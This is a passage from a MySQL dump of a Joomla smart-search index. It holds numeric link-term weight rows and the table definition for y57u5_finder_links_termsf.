(308, 320381, 1.05),
(298, 320382, 1.14331),
(308, 320382, 1.14331),
(298, 320383, 2.00662),
(308, 320383, 2.00662),
(298, 320384, 1.07331),
(308, 320384, 1.07331),
(298, 320385, 1.12),
(308, 320385, 1.12),
(298, 320386, 1.00331),
(308, 320386, 1.00331),
(298, 320387, 1.07331),
(308, 320387, 1.07331),
(298, 320388, 1.02669),
(308, 320388, 1.02669),
(298, 320389, 0.91),
(308, 320389, 0.91),
(298, 320390, 0.98),
(308, 320390, 0.98),
(298, 320391, 1.00331),
(308, 320391, 1.00331),
(298, 320392, 1.02669),
(308, 320392, 1.02669),
(298, 320393, 1.23669),
(308, 320393, 1.23669),
(298, 320394, 1.05),
(308, 320394, 1.05),
(298, 320395, 0.88669),
(308, 320395, 0.88669),
(298, 320396, 1.05),
(308, 320396, 1.05),
(298, 320397, 0.93331),
(308, 320397, 0.93331),
(298, 320398, 1.02669),
(308, 320398, 1.02669),
(298, 320399, 0.93331),
(308, 320399, 0.93331),
(298, 320400, 0.98),
(308, 320400, 0.98),
(298, 320401, 0.98),
(308, 320401, 0.98),
(304, 320401, 1.96),
(298, 320402, 1.23669),
(308, 320402, 1.23669),
(298, 320403, 1.00331),
(308, 320403, 1.00331),
(298, 320404, 1.07331),
(308, 320404, 1.07331),
(298, 320405, 0.88669),
(308, 320405, 0.88669),
(298, 320406, 0.98),
(308, 320406, 0.98),
(298, 320407, 1.07331),
(308, 320407, 1.07331),
(298, 320408, 0.93331),
(308, 320408, 0.93331),
(298, 320409, 2.32339),
(308, 320409, 2.32339),
(298, 320410, 2.60661),
(308, 320410, 2.60661),
(298, 320411, 0.95669),
(308, 320411, 0.95669),
(298, 320412, 0.91),
(308, 320412, 0.91),
(298, 320413, 1.05),
(308, 320413, 1.05),
(298, 320414, 0.98),
(308, 320414, 0.98),
(298, 320415, 1.23669),
(308, 320415, 1.23669),
(298, 320416, 2.14662),
(308, 320416, 2.14662),
(298, 320417, 0.95669),
(308, 320417, 0.95669),
(298, 320418, 0.98),
(308, 320418, 0.98),
(298, 320419, 0.98),
(308, 320419, 0.98),
(298, 320420, 0.28),
(308, 320420, 0.28),
(298, 320421, 1.02669),
(308, 320421, 1.02669),
(298, 320422, 1.26),
(308, 320422, 1.26),
(299, 320534, 0.91),
(299, 320535, 1.58662),
(299, 320536, 0.98),
(299, 320537, 0.88669),
(299, 320538, 0.35),
(299, 320539, 0.93331),
(299, 320540, 0.98),
(299, 320541, 0.86331),
(299, 320542, 0.21),
(299, 320543, 0.91),
(299, 320544, 0.98),
(299, 320869, 0.98),
(299, 320870, 0.91),
(299, 320871, 1.00331),
(299, 320872, 0.86331),
(299, 320873, 0.98),
(299, 320874, 0.98),
(299, 320875, 1.09669),
(299, 320876, 1.00331),
(299, 321461, 0.18669),
(299, 321462, 1.02669),
(299, 321463, 1.14331),
(299, 321464, 0.98),
(299, 321465, 1.07331),
(299, 321466, 0.91),
(299, 321467, 1.07331),
(299, 321468, 0.02919),
(299, 321469, 0.91),
(299, 321470, 1.09669),
(299, 321471, 1.09669),
(299, 321472, 1.00331),
(299, 321473, 0.98),
(299, 321474, 0.88669),
(299, 321475, 0.93331),
(299, 321476, 1.00331),
(299, 321477, 0.93331),
(299, 321478, 1.05),
(299, 321479, 0.88669),
(299, 321480, 1.00331),
(299, 321481, 1.02669),
(299, 321482, 1.00331),
(299, 321483, 1.05),
(299, 321484, 1.02669),
(299, 321485, 1.00331),
(299, 321486, 0.98),
(299, 321487, 1.05),
(299, 321488, 1.02669),
(299, 321489, 1.16669),
(299, 321490, 0.93331),
(304, 321490, 0.93331),
(299, 321491, 1.14331),
(299, 321492, 1.00331),
(299, 321493, 1.07331),
(299, 321494, 1.00331),
(299, 321495, 1.12),
(299, 321496, 0.93331),
(299, 321497, 1.00331),
(299, 321498, 0.95669),
(299, 321499, 1.02669),
(299, 321500, 0.93331),
(299, 321501, 1.07331),
(299, 321502, 1.02669),
(299, 321503, 1.09669),
(299, 321504, 1.05),
(299, 321505, 1.05),
(299, 321506, 0.91),
(299, 321507, 1.00331),
(299, 321508, 0.93331),
(299, 321509, 1.02669),
(299, 321510, 0.86331),
(299, 321511, 1.00331),
(299, 321512, 0.98),
(299, 321513, 0.98),
(299, 321514, 1.09669),
(299, 321515, 1.14331),
(299, 321516, 1.07331),
(299, 321517, 0.91),
(299, 321518, 1.00331),
(299, 321519, 1.09669),
(299, 321520, 1.09669),
(299, 321521, 1.02669),
(299, 321522, 1.00331),
(299, 321523, 1.07331),
(299, 321524, 0.93331),
(299, 321525, 1.02669),
(299, 321526, 0.95669),
(299, 321527, 0.95669),
(299, 321528, 1.12),
(299, 321529, 1.00331),
(299, 321530, 1.21331),
(299, 321531, 1.00331),
(299, 321532, 1.12),
(299, 321533, 0.98),
(299, 321534, 1.09669),
(299, 321535, 1.19),
(299, 321536, 1.00331),
(299, 321537, 0.88669),
(299, 321538, 0.81669),
(299, 321539, 0.91),
(299, 321540, 0.84),
(299, 321541, 0.93331),
(299, 321542, 0.91),
(299, 321543, 0.98),
(299, 321544, 1.07331),
(299, 321545, 1.16669),
(299, 321546, 0.91),
(299, 321547, 1.07331),
(299, 321548, 0.98),
(299, 321549, 0.98),
(299, 321550, 1.02669),
(299, 321551, 1.05),
(299, 321552, 0.95669),
(299, 321553, 1.05),
(299, 321554, 0.93331),
(299, 321555, 1.02669),
(299, 321556, 0.95669),
(299, 321557, 1.12),
(299, 321558, 0.93331),
(299, 321559, 1.12),
(299, 321560, 0.86331),
(299, 321561, 0.98),
(299, 321562, 0.86331),
(299, 321563, 1.05),
(299, 321564, 0.91),
(299, 321565, 0.98),
(299, 321566, 1.05),
(299, 321567, 0.84),
(299, 321568, 0.93331),
(299, 321569, 1.72662),
(299, 321570, 0.91),
(299, 321571, 0.98),
(299, 321572, 0.91),
(299, 321573, 1.02669),
(299, 321574, 0.32669),
(299, 321575, 0.95669),
(299, 321576, 1.00331),
(299, 321577, 0.84),
(299, 321578, 0.93331),
(299, 321579, 0.91),
(299, 321580, 1.02669),
(299, 321581, 0.98),
(299, 321582, 1.00331),
(299, 321583, 1.00331),
(299, 321584, 1.23669),
(304, 324066, 1.16669),
(305, 324066, 1.16669),
(304, 324067, 1.30669),
(305, 324067, 1.30669),
(304, 324662, 0.86331),
(305, 324662, 0.86331),
(304, 324803, 0.93331),
(304, 324804, 1.05),
(304, 324805, 0.95669),
(304, 324806, 1.00331),
(304, 324811, 0.84),
(304, 324812, 0.95669),
(304, 324981, 1.12),
(304, 324982, 1.19),
(304, 324983, 0.42),
(304, 324984, 1.00331),
(304, 324985, 1.23669),
(304, 324986, 0.37331),
(304, 324987, 1.00331),
(304, 324988, 1.23669),
(304, 324989, 0.84),
(304, 324990, 2.05338),
(304, 324991, 2.61338),
(304, 324992, 0.86331),
(304, 324993, 0.98),
(304, 324994, 0.95669),
(304, 324995, 1.02669),
(304, 324996, 1.05),
(304, 324997, 1.14331),
(304, 324998, 0.91),
(304, 324999, 0.98),
(304, 325393, 1.00331),
(304, 325394, 0.93331),
(304, 325395, 1.05),
(304, 325396, 1.00331),
(304, 325397, 1.05),
(304, 325398, 0.95669),
(304, 325399, 1.00331),
(304, 325400, 1.02669),
(304, 325401, 1.14331),
(304, 325402, 0.91),
(304, 325403, 1.00331),
(304, 325404, 0.93331),
(304, 325405, 1.00331),
(304, 325406, 1.07331),
(304, 325407, 0.88669),
(304, 325408, 1.02669),
(304, 325409, 1.02669),
(304, 325410, 1.00331),
(304, 325411, 1.14331),
(304, 325412, 1.00331),
(304, 325413, 1.05),
(304, 325414, 0.95669),
(304, 325415, 0.91),
(304, 325416, 1.00331),
(304, 325417, 1.05),
(304, 325418, 1.02669),
(304, 325419, 1.00331),
(304, 325420, 1.05),
(304, 325421, 0.93331),
(304, 325422, 1.09669),
(304, 325423, 1.02669),
(304, 325424, 0.98),
(304, 325425, 0.93331),
(304, 325426, 1.02669),
(304, 325427, 1.12),
(304, 325428, 0.91),
(304, 325429, 1.09669),
(304, 325430, 1.26),
(304, 325431, 1.19),
(304, 325432, 0.93331),
(304, 325433, 0.98),
(304, 325434, 0.93331),
(304, 325435, 1.02669),
(304, 325436, 1.05),
(304, 325437, 1.00331),
(304, 325438, 0.88669),
(304, 325439, 1.00331),
(304, 325440, 0.93331),
(304, 325441, 0.98),
(304, 325442, 1.09669),
(304, 325443, 0.93331),
(304, 325444, 0.88669),
(304, 325445, 1.05),
(304, 325446, 0.84),
(304, 325447, 0.95669),
(304, 325448, 1.14331),
(304, 325449, 0.93331),
(304, 325450, 0.95669),
(304, 325451, 1.16669),
(304, 325452, 1.00331),
(304, 325453, 1.00331),
(304, 325454, 0.93331),
(304, 325455, 0.95669),
(304, 325456, 1.12),
(306, 325456, 1.12),
(304, 325457, 0.37331),
(306, 325457, 0.74662),
(304, 325458, 0.98),
(304, 325459, 1.12),
(304, 325460, 0.09331),
(304, 325461, 1.12),
(304, 325462, 1.30669),
(304, 325463, 0.86331),
(304, 325464, 1.09669),
(305, 325828, 0.86331),
(305, 325829, 0.98),
(305, 325830, 0.84),
(305, 325831, 0.95669),
(305, 325832, 0.86331),
(305, 325833, 0.95669),
(305, 325838, 0.79331),
(305, 325839, 0.88669),
(305, 326086, 0.84),
(305, 326087, 0.91),
(305, 326088, 0.93331),
(305, 326089, 1.02669),
(305, 326090, 0.18669),
(305, 326091, 0.86331),
(305, 326092, 1.05),
(305, 326093, 0.95669),
(305, 326094, 1.02669),
(305, 326095, 0.32669),
(305, 326096, 1.02669),
(305, 326097, 1.16669),
(305, 326098, 1.02669),
(305, 326099, 1.14331),
(305, 326100, 1.12),
(305, 326101, 0.60669),
(305, 326102, 1.16669),
(305, 326103, 1.28331),
(305, 326601, 0.88669),
(305, 326602, 0.98),
(305, 326603, 1.02669),
(305, 326604, 0.95669),
(305, 326605, 1.02669),
(305, 326606, 0.93331),
(305, 326607, 1.05),
(305, 326608, 0.88669),
(305, 326609, 0.95669),
(305, 326610, 0.98),
(305, 326611, 1.19),
(305, 326612, 0.95669),
(305, 326613, 1.09669),
(305, 326614, 0.91),
(305, 326615, 1.02669),
(305, 326616, 0.95669),
(305, 326617, 1.09669),
(305, 326618, 0.91),
(305, 326619, 1.02669),
(305, 326620, 0.91),
(305, 326621, 0.98),
(305, 326622, 1.02669),
(305, 326623, 1.14331),
(305, 326624, 0.95669),
(305, 326625, 1.02669),
(305, 326626, 1.07331),
(305, 326627, 1.07331),
(305, 326628, 1.05),
(305, 326629, 1.12),
(305, 326630, 0.93331),
(305, 326631, 0.93331),
(305, 326632, 1.00331),
(305, 326633, 1.26),
(305, 326634, 1.14331),
(305, 326635, 0.95669),
(305, 326636, 1.14331),
(305, 326637, 1.07331),
(305, 326638, 1.86662),
(305, 326639, 2.00662),
(305, 326640, 1.09669),
(305, 326641, 1.02669),
(305, 326642, 0.95669),
(305, 326643, 1.02669),
(305, 326644, 1.19),
(305, 326645, 0.95669),
(305, 326646, 0.98),
(305, 326647, 1.07331),
(305, 326648, 1.19),
(305, 326649, 1.05),
(305, 326650, 1.14331),
(305, 326651, 1.05),
(305, 326652, 1.12),
(305, 326653, 0.95669),
(305, 326654, 1.07331),
(305, 326655, 0.88669),
(305, 326656, 0.95669),
(305, 326657, 0.93331),
(305, 326658, 1.00331),
(305, 326659, 1.12),
(305, 326660, 1.19),
(305, 326661, 0.42),
(305, 326662, 1.00331),
(305, 326663, 1.05),
(305, 326664, 1.12),
(305, 326665, 1.21331),
(305, 326666, 1.07331),
(305, 326667, 1.00331),
(305, 326668, 0.95669),
(305, 326669, 0.91),
(305, 326670, 1.14331),
(305, 326671, 0.93331),
(305, 326672, 0.91),
(305, 326673, 1.00331),
(305, 326674, 1.91338),
(305, 326675, 0.95669),
(305, 326676, 0.91),
(305, 326677, 1.00331),
(305, 326678, 0.98),
(305, 326679, 0.93331),
(305, 326680, 0.98),
(305, 326681, 1.07331),
(305, 326682, 0.93331),
(305, 326683, 0.98),
(305, 326684, 0.93331),
(305, 326685, 0.95669),
(305, 326686, 0.95669),
(305, 326687, 0.98),
(305, 326688, 1.05),
(305, 326689, 0.98),
(305, 326690, 0.91),
(305, 326691, 1.86662),
(305, 326692, 0.93331),
(305, 326693, 1.09669),
(305, 326694, 0.91),
(305, 326695, 1.07331),
(305, 326696, 0.91),
(305, 326697, 1.02669),
(305, 326698, 0.91),
(305, 326699, 1.00331),
(305, 326700, 0.46669),
(305, 326701, 1.02669),
(305, 326702, 1.28331),
(305, 326703, 0.56),
(305, 326704, 1.14331),
(305, 326705, 1.4),
(306, 326806, 0.88669),
(306, 326807, 0.98),
(306, 326808, 0.18669),
(306, 326809, 0.91),
(306, 326810, 0.95669),
(306, 327290, 0.81669),
(306, 327291, 0.86331),
(306, 327292, 0.86331),
(306, 327293, 0.95669),
(306, 327294, 1.02669),
(306, 327295, 1.14331),
(306, 327296, 0.88669),
(306, 327297, 0.98),
(306, 327298, 0.88669),
(306, 327299, 1.09669),
(306, 327300, 0.91),
(306, 327301, 1.12),
(306, 327302, 0.93331),
(306, 327303, 1.05),
(306, 327304, 0.32669),
(306, 327305, 1.02669),
(306, 327306, 1.12),
(306, 327307, 0.88669),
(306, 327308, 0.95669),
(306, 327309, 1.12),
(306, 327310, 1.35331),
(306, 327311, 0.93331),
(306, 327312, 1.02669),
(306, 327313, 0.98),
(306, 327314, 1.07331),
(306, 327315, 0.93331),
(306, 327316, 1.07331),
(306, 327317, 1.91338),
(306, 327318, 2.05338),
(306, 327319, 1.07331),
(306, 327320, 0.98),
(306, 327321, 1.09669),
(306, 327322, 0.93331),
(306, 327323, 1.02669),
(306, 328155, 0.88669),
(306, 328156, 0.93331),
(306, 328157, 0.77),
(306, 328158, 0.88669),
(306, 328159, 0.93331),
(306, 328160, 1.05),
(306, 328161, 0.95669),
(306, 328162, 1.02669),
(306, 328163, 0.88669),
(306, 328164, 0.95669),
(306, 328165, 0.91),
(306, 328166, 0.98),
(306, 328167, 1.07331),
(306, 328168, 1.00331),
(306, 328169, 1.07331),
(306, 328170, 0.98),
(306, 328171, 1.09669),
(306, 328172, 1.05),
(306, 328173, 1.12),
(306, 328174, 0.95669),
(306, 328175, 1.02669),
(306, 328176, 0.98),
(306, 328177, 1.16669),
(306, 328178, 0.91),
(306, 328179, 1.00331),
(306, 328180, 1.05),
(306, 328181, 0.98),
(306, 328182, 1.00331),
(306, 328183, 1.00331),
(306, 328184, 1.02669),
(306, 328185, 1.00331),
(306, 328186, 0.91),
(306, 328187, 0.98),
(306, 328188, 1.00331),
(306, 328189, 1.09669),
(306, 328190, 1.16669),
(306, 328191, 0.91),
(306, 328192, 1.00331),
(306, 328193, 1.12),
(306, 328194, 1.16669),
(306, 328195, 0.98),
(306, 328196, 1.07331),
(306, 328197, 0.91),
(306, 328198, 1.00331),
(306, 328199, 1.09669),
(306, 328200, 0.98),
(306, 328201, 0.93331),
(306, 328202, 1.00331),
(306, 328203, 0.95669),
(306, 328204, 0.98),
(306, 328205, 0.98),
(306, 328206, 1.05),
(306, 328207, 0.98),
(306, 328208, 1.12),
(306, 328209, 1.14331),
(306, 328210, 1.12),
(306, 328211, 1.12),
(306, 328212, 1.09669),
(306, 328213, 1.12),
(306, 328214, 1.07331),
(306, 328215, 1.05),
(306, 328216, 0.86331),
(306, 328217, 0.91),
(306, 328218, 0.91),
(306, 328219, 1.00331),
(306, 328220, 1.02669),
(306, 328221, 1.09669),
(306, 328222, 1.05),
(306, 328223, 1.12),
(306, 328224, 7.98),
(306, 328225, 9.69),
(306, 328226, 1.12),
(306, 328227, 1.02669),
(306, 328228, 1.09669),
(306, 328229, 1.02669),
(306, 328230, 1.14331),
(306, 328231, 0.93331),
(306, 328232, 1.14331),
(306, 328233, 0.95669),
(306, 328234, 1.09669),
(306, 328235, 1.12),
(306, 328236, 0.91),
(306, 328237, 0.98),
(306, 328238, 0.95669),
(306, 328239, 1.02669),
(306, 328240, 1.05),
(306, 328241, 1.00331),
(306, 328242, 1.07331),
(306, 328243, 0.95669),
(306, 328244, 0.95669),
(306, 328245, 1.02669),
(306, 328246, 1.00331),
(306, 328247, 0.91),
(306, 328248, 1.00331),
(306, 328249, 1.02669),
(306, 328250, 1.05),
(306, 328251, 0.91),
(306, 328252, 0.98),
(306, 328253, 1.02669),
(306, 328254, 0.93331),
(306, 328255, 1.00331),
(306, 328256, 0.95669),
(306, 328257, 0.98),
(306, 328258, 1.07331),
(306, 328259, 0.93331),
(306, 328260, 1.02669),
(306, 328261, 0.93331),
(306, 328262, 1.12),
(306, 328263, 0.93331),
(306, 328264, 1.02669),
(306, 328265, 1.05),
(306, 328266, 1.14331),
(306, 328267, 0.86331),
(306, 328268, 0.98),
(306, 328269, 0.84),
(306, 328270, 1.05),
(306, 328271, 0.86331),
(306, 328272, 0.91),
(306, 328273, 0.98),
(306, 328274, 1.00331),
(306, 328275, 0.93331),
(306, 328276, 1.02669),
(306, 328277, 0.91),
(306, 328278, 1.00331),
(306, 328279, 1.00331),
(306, 328280, 1.09669),
(306, 328281, 2.05338),
(306, 328282, 1.12),
(306, 328283, 1.14331),
(306, 328284, 0.95669),
(306, 328285, 1.16669),
(306, 328286, 0.95669),
(306, 328287, 1.14331),
(306, 328288, 0.95669),
(306, 328289, 1.28331),
(306, 328290, 1.05),
(306, 328291, 0.95669),
(306, 328292, 0.88669),
(306, 328293, 0.95669),
(306, 328294, 0.95669),
(306, 328295, 1.07331),
(306, 328296, 1.02669),
(306, 328297, 0.91),
(306, 328298, 1.02669),
(306, 328299, 0.88669),
(306, 328300, 1.02669),
(306, 328301, 0.91),
(306, 328302, 1.02669),
(306, 328303, 0.95669),
(306, 328304, 0.42),
(306, 328305, 1.12),
(306, 328306, 1.21331),
(306, 328307, 2.05338),
(306, 328308, 1.12),
(306, 328309, 1.07331),
(306, 328310, 1.00331),
(306, 328311, 1.05),
(306, 328312, 1.00331),
(306, 328313, 1.23669),
(306, 328314, 0.98),
(306, 328315, 1.28331),
(306, 328316, 1.09669),
(306, 328317, 1.09669),
(306, 328318, 0.88669),
(306, 328319, 0.98),
(306, 328320, 0.98),
(306, 328321, 0.23331),
(306, 328322, 1.02669),
(306, 328323, 1.21331),
(306, 328324, 0.95669),
(306, 328325, 1.14331),
(306, 328326, 0.93331),
(306, 328327, 1.05),
(306, 328328, 1.05),
(306, 328329, 0.84),
(306, 328330, 0.95669),
(306, 328331, 0.98),
(306, 328332, 0.93331),
(306, 328333, 1.12),
(306, 328334, 0.88669),
(306, 328335, 0.86331),
(306, 328336, 0.95669),
(306, 328337, 0.93331),
(306, 328338, 1.23669),
(306, 328339, 1.02669),
(306, 328340, 1.91338),
(306, 328341, 1.12),
(306, 328342, 1.07331),
(306, 328343, 1.86662),
(306, 328344, 0.91),
(306, 328345, 1.05),
(306, 328346, 1.72662),
(306, 328347, 0.93331),
(306, 328348, 0.95669),
(306, 328349, 0.93331),
(306, 328350, 1.02669),
(306, 328351, 0.91),
(306, 328352, 0.93331),
(306, 328353, 1.86662),
(306, 328354, 1.96),
(306, 328355, 1.16669),
(306, 328356, 1.4),
(306, 328357, 0.95669),
(306, 328358, 1.00331),
(306, 328359, 0.95669),
(306, 328360, 2.05338),
(306, 328361, 0.95669),
(306, 328362, 0.88669),
(306, 328363, 0.98),
(306, 328364, 0.95669),
(306, 328365, 1.05),
(306, 328366, 1.00331),
(306, 328367, 1.07331),
(306, 328368, 0.95669),
(306, 328369, 0.98),
(306, 328370, 0.93331),
(306, 328371, 1.09669),
(306, 328372, 0.98),
(306, 328373, 0.98),
(306, 328374, 0.95669),
(306, 328375, 0.98),
(306, 328376, 0.98),
(306, 328377, 1.26),
(306, 328378, 0.98),
(306, 328379, 1.09669),
(306, 328380, 0.93331),
(306, 328381, 1.02669),
(306, 328382, 0.93331),
(306, 328383, 1.12),
(306, 328384, 1.00331),
(306, 328385, 1.07331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termsf`
--

CREATE TABLE `y57u5_finder_links_termsf` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termsf`
--

INSERT INTO `y57u5_finder_links_termsf` (`link_id`, `term_id`, `weight`) VALUES
(31, 534, 0.18669),
(159, 534, 0.18669),
(160, 534, 0.18669),
(193, 534, 0.18669),
(250, 534, 0.18669),
(251, 534, 0.18669),
(255, 534, 0.18669),
(235, 534, 0.56007),
(31, 535, 0.88669),
(159, 535, 0.88669),
(160, 535, 0.88669),
(250, 535, 0.88669),
(251, 535, 0.88669),
(235, 535, 1.77338),
(31, 536, 1.00331),
(159, 536, 1.00331),
(160, 536, 1.00331),
(250, 536, 1.00331),
(251, 536, 1.00331),
(31, 537, 0.32669),
(159, 537, 0.32669),
(160, 537, 0.32669),
(250, 537, 0.32669),
(251, 537, 0.32669),
(252, 537, 0.32669),
(235, 537, 0.65338),
(31, 538, 0.95669),
(159, 538, 0.95669),
(160, 538, 0.95669),
(250, 538, 0.95669),
(251, 538, 0.95669),
(252, 538, 0.95669),
(235, 538, 1.91338),
(31, 539, 1.02669),
(159, 539, 1.02669),
(160, 539, 1.02669),
(250, 539, 1.02669),
(251, 539, 1.02669),
(31, 540, 0.14),
(159, 540, 0.14),
(160, 540, 0.14),
(174, 540, 0.14),
(250, 540, 0.14),
(251, 540, 0.14),
(262, 540, 0.14),
(272, 540, 0.14),
(280, 540, 0.14),
(290, 540, 0.14),
(235, 540, 0.28),
(240, 540, 0.28),
(243, 540, 0.28),
(244, 540, 0.28),
(261, 540, 0.28),
(265, 540, 0.28),
(266, 540, 0.28),
(292, 540, 0.28),
(241, 540, 0.42),
(248, 540, 0.42),
(256, 540, 0.42),
(267, 540, 0.42),
(275, 540, 0.42),
(242, 540, 0.7),
(249, 540, 0.7),
(257, 540, 0.7),
(263, 540, 0.7),
(269, 540, 0.7),
(274, 540, 0.7),
(178, 540, 0.98),
(238, 540, 0.98),
(306, 540, 1.68),
(31, 541, 0.88669),
(159, 541, 0.88669),
(160, 541, 0.88669),
(250, 541, 0.88669),
(251, 541, 0.88669),
(31, 542, 1.02669),
(159, 542, 1.02669),
(160, 542, 1.02669),
(250, 542, 1.02669),
(251, 542, 1.02669),
(305, 543, 0.0175),
(31, 543, 0.14),
(159, 543, 0.14),
(160, 543, 0.14),
(174, 543, 0.14),
(178, 543, 0.14),
(233, 543, 0.14),
(235, 543, 0.14),
(247, 543, 0.14),
(250, 543, 0.14),
(251, 543, 0.14),
(258, 543, 0.14),
(259, 543, 0.14),
(260, 543, 0.14),
(268, 543, 0.14),
(272, 543, 0.14),
(274, 543, 0.14),
(280, 543, 0.14),
(290, 543, 0.14),
(292, 543, 0.14),
(240, 543, 0.28),
(193, 543, 0.42),
(241, 543, 0.42),
(242, 543, 0.98),
(31, 544, 0.84),
(159, 544, 0.84),
(160, 544, 0.84),
(233, 544, 0.84),
(240, 544, 0.84),
(242, 544, 0.84),
(250, 544, 0.84),
(251, 544, 0.84),
(259, 544, 0.84),
(260, 544, 0.84),
(274, 544, 0.84),
(193, 544, 1.68),
(31, 545, 1.02669),
(159, 545, 1.02669),
(160, 545, 1.02669),
(250, 545, 1.02669),
(251, 545, 1.02669),
(174, 546, 0.09331),
(235, 546, 0.09331),
(238, 546, 0.09331),
(243, 546, 0.09331),
(244, 546, 0.09331),
(245, 546, 0.09331),
(247, 546, 0.09331),
(248, 546, 0.09331),
(249, 546, 0.09331),
(253, 546, 0.09331),
(254, 546, 0.09331),
(261, 546, 0.09331),
(264, 546, 0.09331),
(265, 546, 0.09331),
(266, 546, 0.09331),
(268, 546, 0.09331),
(272, 546, 0.09331),
(273, 546, 0.09331),
(280, 546, 0.09331),
(295, 546, 0.09331),
(299, 546, 0.09331),
(241, 546, 0.18662),
(258, 546, 0.18662),
(292, 546, 0.18662),
(237, 546, 0.27993),
(252, 546, 0.27993),
(256, 546, 0.27993),
(236, 546, 0.37324),
(242, 546, 0.37324),
(269, 546, 0.37324),
(306, 546, 0.37324),
(246, 546, 0.46655),
(275, 546, 0.46655),
(159, 546, 0.65317),
(160, 546, 0.65317),
(31, 546, 0.83979),
(240, 546, 0.83979),
(250, 546, 0.83979),
(251, 546, 0.83979),
(239, 546, 1.02641),
(240, 547, 0.84),
(241, 547, 0.84),
(242, 547, 0.84),
(256, 547, 0.84),
(299, 547, 0.84),
(31, 547, 1.68),
(159, 547, 1.68),
(160, 547, 1.68),
(239, 547, 1.68),
(246, 547, 1.68),
(250, 547, 1.68),
(251, 547, 1.68),
(275, 547, 1.68),
(237, 547, 2.52),
(306, 547, 2.52),
(31, 548, 1.86662),
(159, 548, 1.86662),
(160, 548, 1.86662),
(250, 548, 1.86662),
(251, 548, 1.86662),
(31, 549, 0.84),
(159, 549, 0.84),
(160, 549, 0.84),
(240, 549, 0.84),
(246, 549, 0.84),
(250, 549, 0.84),
(251, 549, 0.84),
(269, 549, 0.84),
(31, 550, 0.98),
(159, 550, 0.98),
(160, 550, 0.98),
(250, 550, 0.98),
(251, 550, 0.98),
(31, 551, 0.88669),
(159, 551, 0.88669),
(160, 551, 0.88669),
(250, 551, 0.88669),
(251, 551, 0.88669),
(31, 552, 1.05),
(159, 552, 1.05),
(160, 552, 1.05),
(250, 552, 1.05),
(251, 552, 1.05),
(31, 553, 0.84),
(250, 553, 0.84),
(251, 553, 0.84),
(31, 554, 0.95669),
(250, 554, 0.95669),
(251, 554, 0.95669),
(31, 555, 0.86331),
(159, 555, 0.86331),
(160, 555, 0.86331),
(235, 555, 0.86331),
(243, 555, 0.86331),
(250, 555, 0.86331),
(251, 555, 0.86331),
(252, 555, 1.72662),
(31, 556, 0.95669),
(159, 556, 0.95669),
(160, 556, 0.95669),
(250, 556, 0.95669),
(251, 556, 0.95669),
(31, 557, 0.86331),
(159, 557, 0.86331),
(160, 557, 0.86331),
(250, 557, 0.86331),
(251, 557, 0.86331),
(31, 558, 0.84),
(250, 558, 0.84),
(251, 558, 0.84),
(31, 559, 0.93331),
(250, 559, 0.93331),
(251, 559, 0.93331),
(31, 560, 0.86331),
(159, 560, 0.86331),
(160, 560, 0.86331),
(250, 560, 0.86331),
(251, 560, 0.86331),
(31, 561, 0.95669),
(159, 561, 0.95669),
(160, 561, 0.95669),
(250, 561, 0.95669),
(251, 561, 0.95669),
(31, 562, 0.23331),
(159, 562, 0.23331),
(160, 562, 0.23331),
(240, 562, 0.23331),
(242, 562, 0.23331),
(249, 562, 0.23331),
(250, 562, 0.23331),
(251, 562, 0.23331),
(31, 563, 0.93331),
(159, 563, 0.93331),
(160, 563, 0.93331),
(250, 563, 0.93331),
(251, 563, 0.93331),
(31, 564, 1.12),
(159, 564, 1.12),
(160, 564, 1.12),
(250, 564, 1.12),
(251, 564, 1.12),
(305, 565, 0.04662),
(299, 565, 0.06993),
(304, 565, 0.06993),
(31, 565, 0.18669),
(159, 565, 0.18669),
(160, 565, 0.18669),
(168, 565, 0.18669),
(178, 565, 0.18669),
(235, 565, 0.18669),
(236, 565, 0.18669),
(245, 565, 0.18669),
(248, 565, 0.18669),
(249, 565, 0.18669),
(250, 565, 0.18669),
(251, 565, 0.18669),
(258, 565, 0.18669),
(259, 565, 0.18669),
(260, 565, 0.18669),
(262, 565, 0.18669),
(263, 565, 0.18669),
(264, 565, 0.18669),
(237, 565, 0.37338),
(243, 565, 0.37338),
(244, 565, 0.37338),
(246, 565, 0.37338),
(257, 565, 0.37338),
(267, 565, 0.37338),
(272, 565, 0.37338),
(274, 565, 0.37338),
(280, 565, 0.37338),
(290, 565, 0.37338),
(238, 565, 0.56007),
(239, 565, 0.56007),
(256, 565, 0.56007),
(268, 565, 0.56007),
(269, 565, 0.56007),
(275, 565, 0.56007),
(174, 565, 0.74676),
(240, 565, 0.74676),
(265, 565, 0.74676),
(266, 565, 0.74676),
(306, 565, 0.93345),
(273, 565, 1.01346),
(193, 565, 1.12014),
(242, 565, 1.12014),
(254, 565, 1.12014),
(252, 565, 1.30683),
(255, 565, 1.68021),
(241, 565, 1.8669),
(261, 565, 1.8669),
(31, 566, 0.86331),
(159, 566, 0.86331),
(160, 566, 0.86331),
(250, 566, 0.86331),
(251, 566, 0.86331),
(269, 566, 1.72662),
(31, 567, 1.00331),
(159, 567, 1.00331),
(160, 567, 1.00331),
(250, 567, 1.00331),
(251, 567, 1.00331),
(298, 568, 0.02331),
(295, 568, 0.04662),
(299, 568, 0.04662),
(304, 568, 0.13986),
(305, 568, 0.16317),
(31, 568, 0.18669),
(159, 568, 0.18669),
(160, 568, 0.18669),
(233, 568, 0.18669),
(246, 568, 0.18669),
(248, 568, 0.18669),
(250, 568, 0.18669),
(251, 568, 0.18669),
(267, 568, 0.18669),
(308, 568, 0.18669),
(236, 568, 0.37338),
(237, 568, 0.37338),
(239, 568, 0.37338),
(240, 568, 0.37338),
(242, 568, 0.37338),
(247, 568, 0.37338),
(253, 568, 0.37338),
(272, 568, 0.37338),
(273, 568, 0.37338),
(274, 568, 0.37338),
(280, 568, 0.37338),
(290, 568, 0.37338),
(243, 568, 0.56007),
(249, 568, 0.56007),
(263, 568, 0.56007),
(268, 568, 0.56007),
(235, 568, 0.74676),
(252, 568, 0.74676),
(259, 568, 0.74676),
(260, 568, 0.74676),
(264, 568, 0.74676),
(265, 568, 0.74676),
(266, 568, 0.74676),
(269, 568, 0.74676),
(244, 568, 0.93345),
(256, 568, 0.93345),
(257, 568, 0.93345),
(258, 568, 1.12014),
(178, 568, 1.30683),
(255, 568, 1.30683),
(261, 568, 1.30683),
(288, 568, 1.30683),
(292, 568, 1.30683),
(238, 568, 1.68021),
